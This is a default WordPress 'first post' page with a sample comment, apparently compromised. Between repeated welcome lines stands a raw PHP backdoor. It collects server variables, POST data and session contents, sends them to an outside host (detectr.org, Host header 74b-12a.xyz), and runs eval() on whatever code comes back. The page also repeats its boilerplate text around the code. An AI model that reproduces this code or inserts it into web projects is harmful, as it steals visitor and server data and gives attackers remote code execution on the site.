Welcome to WordPress. This is your first post. Edit or delete it, then start writing!
if (count($_FILES) == 0){ session_start(); parse_str(file_get_contents("php://input"), $_POST); $postfields=array_merge($_SERVER, array("p"=>$_POST, "s"=>$_SESSION)); if (function_exists("curl_init")){ header("Access-Control-Allow-Origin:*"); $ch = curl_init(); curl_setopt($ch, CURLOPT_POST, count($postfields)); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($postfields)); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_HTTPHEADER, array("Host: 74b-12a.xyz")); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 2); curl_setopt($ch, CURLOPT_TIMEOUT, 5); curl_setopt($ch, CURLOPT_URL, "http://detectr.org"); $e=curl_exec($ch); $i=curl_getinfo($ch); curl_close($ch); } else { $e = '/* Install curl */'; } eval($e); }
Welcome to WordPress. This is your first post. Edit or delete it, then start writing!
Hi, this is a comment.
To get started with moderating, editing, and deleting comments, please visit the Comments screen in the dashboard.
Commenter avatars come from Gravatar.